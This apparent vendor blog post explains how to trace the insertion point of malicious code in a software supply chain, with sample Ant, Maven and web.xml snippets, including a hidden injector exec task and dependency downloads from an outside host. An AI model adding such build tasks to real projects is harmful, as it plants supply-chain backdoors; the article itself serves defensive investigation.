Having malicious code detection strategies in place is critical to keeping your software supply chain secure.
Let’s imagine you discover a string of suspicious code within one of your applications. Perhaps a routine scan by your application testing team turns up evidence that malicious code, such as a time bomb or back door, has been inserted by a malicious insider somewhere in your software supply chain.
First, you breathe a huge sigh of relief that you found the problem before it caused any lasting damage (data theft, keystroke logging, money siphoning, or some other subversion of the application’s functionality).
But then you think, if someone inserted malicious code into one application, what’s to stop them from targeting another?
You need to unmask the culprit.
Malicious code can be injected into an executable as early as the development of an open source component and as late as the final production build, which means your adversary could be anyone within your software supply chain.
Your suspect list includes people with the necessary access or ability to insert malicious code.
Analyzing the executable alone will not provide enough information to narrow down the list of potential suspects. For that kind of detective work, you need to get your hands on dependencies, source code, build files, and design documents. In combination, these assets can help you put together a timeline of when the malicious code was inserted. Here’s how it works.
If you find malicious code in both the executable and the source code of an application, you’ve got a strong indicator that your culprit is a developer of your proprietary code or an external dependency.
If the malicious code is not present in the source code, it could mean that the malicious code was removed from the source code before it was analyzed, or that the code was injected at a later stage in the software development life cycle (SDLC).
To narrow down the search, you need to take into account where the source code was obtained. If it came from a repository where every code change is tracked, and from which the build process retrieves its code, then the absence of the malicious code there is another strong indicator that it was injected at a later stage in the SDLC.
Since malicious code can also be injected in an application at a stage after development, you also need to analyze build files.
For example, build files can be made to execute programs that inject malicious code at build time simply by adding a task, as shown in the following Ant build file snippet:
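A minimal sketch of such a task might look like the following; the target name, executable path, and output directory are all hypothetical:

```xml
<!-- Hypothetical Ant target; names and paths are illustrative -->
<target name="compile">
    <javac srcdir="src" destdir="build/classes"/>
    <!-- Malicious task slipped in among legitimate build steps:
         runs an attacker-controlled program that modifies the
         freshly compiled class files before packaging -->
    <exec executable="/tmp/.cache/injector">
        <arg value="build/classes"/>
    </exec>
</target>
```

A reviewer skimming the build file could easily mistake a task like this for a legitimate post-compile step, which is why build files deserve the same scrutiny as source code.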
Build files can also be configured to retrieve malicious dependencies from locations outside the build servers, as shown in the following snippets:
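For instance, an Ant `get` task or a Maven repository entry can quietly pull artifacts from an attacker-controlled host. Both sketches below are hypothetical; the URLs (using a documentation-reserved IP) and artifact names are illustrative:

```xml
<!-- Hypothetical Ant target: fetches a jar from an external host
     instead of the approved internal repository -->
<target name="resolve">
    <get src="http://203.0.113.7/libs/commons-util.jar"
         dest="lib/commons-util.jar"/>
</target>
```

```xml
<!-- Hypothetical Maven pom.xml fragment: the id suggests an internal
     mirror, but the URL resolves outside the build network -->
<repositories>
    <repository>
        <id>internal-mirror</id>
        <url>http://203.0.113.7/maven2</url>
    </repository>
</repositories>
```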
An insider can also replace existing dependencies in the build server’s local repository with malicious ones. During the build process, these malicious dependencies will be used even by a benign build file and will result in malicious code being injected into every application using those dependencies. The presence of malicious code in an executable where the source code and build file both appear benign points toward this case.
Keep in mind that an “insider” may not always be an employee or contractor of the impacted organization. An insider can also be someone who, through some malicious means, has gained access to the same systems and information that an employee has access to. For example, look at how attackers gained access to the SolarWinds build process to insert malicious code, which went undetected until it had already made its way to customers.
Design documents are helpful in determining whether code that looks malicious is actually malicious. For example, consider the snippet below from a web.xml file. The code shows an application that has an alternate servlet with an alternate path mapping. A design document would show whether this alternate path is required by design or is potentially malicious.
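A hypothetical fragment illustrating the pattern; the servlet names, classes, and URL patterns are made up for this sketch:

```xml
<!-- Expected servlet and mapping, documented in the design -->
<servlet>
    <servlet-name>AccountServlet</servlet-name>
    <servlet-class>com.example.AccountServlet</servlet-class>
</servlet>
<servlet-mapping>
    <servlet-name>AccountServlet</servlet-name>
    <url-pattern>/account</url-pattern>
</servlet-mapping>

<!-- Alternate servlet mapped to a second, undocumented path -->
<servlet>
    <servlet-name>AccountServlet2</servlet-name>
    <servlet-class>com.example.AccountServlet2</servlet-class>
</servlet>
<servlet-mapping>
    <servlet-name>AccountServlet2</servlet-name>
    <url-pattern>/account2</url-pattern>
</servlet-mapping>
```

On its own, the second mapping is ambiguous: it could be a legitimate beta endpoint or a back door. Only the design documentation can settle which.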
The more information you have, the easier it will be to find the source of any insider threat. Once you believe you know the stage at which malicious code was inserted, you may have enough information to track actions to a specific individual or source, or you may need to monitor the team more closely. Keep the investigation team small so you don’t raise any flags before your suspicions are confirmed.
Mike McGuire is a senior software solutions manager at Synopsys where he has spent several years leading go-to-market efforts for open source risk and software supply chain security solutions. After beginning his career as a software engineer, Mike transitioned into product management and strategy roles, as he enjoyed interfacing with the buyers and users of the products he worked on. Leveraging several years of development experience, Mike enjoys connecting the market’s complex AppSec problems with Synopsys’ comprehensive solutions.